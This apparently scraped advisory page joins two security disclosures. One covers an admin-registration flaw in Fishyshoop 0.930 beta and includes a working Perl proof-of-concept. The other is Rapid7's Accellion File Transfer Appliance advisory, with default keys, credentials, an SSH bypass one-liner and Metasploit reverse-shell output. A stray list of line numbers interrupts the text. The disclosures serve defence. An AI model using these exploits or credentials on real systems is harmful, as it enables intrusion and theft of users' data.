Synopsis ======== The Fishyshoop shopping cart software contains a vulnerability which allows arbitrary users to create accounts with administrator privileges Background ========== Fishyshoop is a suite of PHP scripts allowing anybody to create an attractive online store. Affected Versions ================= Verified on 0.930 beta. Previous versions may also be affected. Impact ====== The user gains administrator privileges in the software, meaning they are free to alter many aspects of the store, as well as committing theft of personal information belonging to other users of the store. Description =========== pages/register/register.php takes every POST variable and inserts the value into a new record under a field with the same name. If a new registration is made with the variable is_admim set to 1, the account will have administrator privileges on the site. Proof of Concept ================ #!/usr/bin/perl use WWW::Curl::Easy; sub usage() { print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n"; exit(); } $FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage(); my $fishyshoop = new WWW::Curl::Easy; $fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register"); $fishyshoop->setopt(CURLOPT_POST, 1); $fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1"); $fishyshoop->perform; |
Fishyshoop Shopping Cart 0.930 Beta suffers from a vulnerability that allows arbitrary users to create accounts with administrator privileges.
H D Moore/Accellion File Transfer Appliance Multiple Vulnerabilities(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
|
R7-0039: Accellion File Transfer Appliance Multiple Vulnerabilities February 7, 2011 -- Vulnerability Details: The Accellion File Transfer Appliance, prior to version FTA_8_0_562, suffers from a number of security flaws that can lead to a remote root compromise. 1. Message Routing Daemon Default Encryption Keys The appliance ships with UDP port 8812 allowed through the firewall. The port correlates to an internal service that routes messages between backend processes. To authenticate access to this service, all messages must be encrypted with a secret key using the blowfish algorithm. The appliance ships with two default keys, neither of which is random, which results in an attacker being able to communicate with the internal processes of the appliance and perform administration tasks on the appliance itself. These two default keys are 123456789ABCDEF0123456789ABCDEF0 and 0123456789ABCDEF0123456789ABCDEF, which are expanded with MD5 to create 448-bit blowfish keys. 2. MatchRep Daemon insert_plugin_meta_info() Command Injection One of the applications that is exposed through the port 8812 message routing service executes a system command without sanitizing the arguments provided by the requesting application. This allows arbitrary commands to be executed on the appliance. Combined with Issue #1, this allows remote, unauthenticated command execution on the appliance as the "soggycat" user, which is root equivalent (sudo rights). Rapid7 has developed a Metasploit module[***] to chain these vulnerabilities and will release this module in early March. 3. Remote Administration TTY Check Bypass The appliance ships with a default login of admin/accellion. To reduce the risk of remote attack, this account is not allowed to login over Secure Shell. The implementation of this security check has a flaw and it is still possible to configure an out-of-box Accellion appliance remotely through SSH, simply by executing a shell without a TTY: (ssh admin@target 'sh') 4. Static Passwords for Privileged User Accounts The secure shell daemon is running by default and the system is configured with static passwords for a number of root-equivalent accounts. It is possible to crack these passwords and gain access to any Accellion system with the secure shell daemon exposed. The scope of our research did not provide time to crack these passwords, but its a just a question of resource allocation. These accounts include "soggycat","sdadmin", and the "root" user account itself. 5. Remote Access via Stale SSH Authorized Keys The "soggycat" user account has a static password, as mentioned previously, but also has two SSH keys configured for passwordless login. These keys were generated over eight years ago and should have been changed to reduce the risk of exposure. The comments of these two keys are worrying as well: [root@fta soggycat]# grep -i comment .ssh2/*.pub .ssh2/theone.pub:Comment: "i am going to kiiiiiiiiiiiiill you" .ssh2/thetwo.pub:Comment: "1024-bit dsa, kelvin@admin.c1s1.net, Mon Feb 25 2002 05:31:0 6. Weak MySQL Password for "root" Account This issue is not exploitable by default due to firewall configuration of the appliance, but it points to larger problems with the design of the system. The root password for the MySQL server is simply "hawksql" and all users of the system are able to read this password within various configuration files. At the least, a non-root MySQL user account should be used to reduce the risk of attack due to SQL Injection flaws in the rest of the application. 7. Internal Daemons not Bound to Loopback Interface This issue is not exploitable by default due to firewall configuration of the appliance. All internal services communicate through UDP services bound to the 0.0.0.0 address. This exposes the internal workings of the appliance to an attacker with network access to the system. For example, a local user account without administrative rights would still be able to escalate privileges by communicating with these internal services. 8. Rsync Daemon Allows Access to Privileged User Home Directory This issue is not exploitable by default due to firewall configuration of the appliance. The rsync daemon allows read/write access to the "soggycat" home directory. Since this user account is root-equivalent, any attacker than talk to the rsync daemon can take full control of the appliance. *** Information from the Metasploit module combining issues #1 and #2, to be released in early March of 2011. Description: This module exploits a chain of vulnerabilities in the Accellion File Transfer appliance. This appliance exposes a UDP service on port 8812 that acts as a gateway to the internal communication bus. This service uses Blowfish encryption for authentication, but the appliance ships with two easy to guess default authentication keys. This module abuses the known default encryption keys to inject a message into the communication bus. In order to execute arbitrary commands on the remote appliance, a message is injected into the bus destined for the 'matchrep' service. This service exposes a function named 'insert_plugin_meta_info' which is vulnerable to an input validation flaw in a call to system(). This provides access to the 'soggycat' user account, which has sudo privileges to run the primary admin tool as root. msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151 msf exploit(accellion_fta_mpipe2) > exploit [*] Started reverse handler on 192.168.198.135:4444 [*] Command shell session 1 opened (192.168.198.135:4444 -> 192.168.198.151:42239) at 2010-11-15 23:50:35 -0600 id uid=520(soggycat) gid=99(nobody) groups=99(nobody) -- Vendor Response: Accellion addressed item #3 on December 21st, 2010 with update FTA_8_0_540 Accellion addressed items #1, #2, #4, #5, #6, and #7 on January 17th, 2011 with update FTA_8_0_562 Item #8 is not exploitable in the default configuration and Accellion recommends the use of SSL VPN when configuring a trusted link between two appliances. Official Changelog for FTA_8_0_562: The update randomizes the following on the Accellion setup - Accellion remote management user password, the system mysql password and the keys used for encrypting inter-appliance communication. All internal Daemons are now bound to Loopback Interface. The update also removes an unused SSH key meant for remote troubleshooting login. These fixes are in response to a security scan done by Rapid7. -- Disclosure Timeline: 2010-10-21 - Issue #3 was reported to Accellion 2010-12-06 - Issues #1, #2, #4, #5, #6, #7, #8 reported to Accellion 2010-12-20 - A reminder the Rapid7 policy was sent to Accellion 2010-12-21 - Accellion responds with a fix date of January 2011 2010-12-21 - Accellion releases FTA_8_0_540 to address #3 2011-01-17 - Accellion releases FTA_8_0_562 to address remaining items 2011-02-07 - Detailed advisory released by Rapid7 -- Credit: This vulnerability was discovered by HD Moore -- About Rapid7 Security Rapid7 provides vulnerability management, compliance and penetration testing solutions for Web application, network and database security. In addition to developing the NeXpose Vulnerability Management system, Rapid7 manages the Metasploit Project and is the primary sponsor of the W3AF web assessment tool. Our vulnerability disclosure policy is available online at: |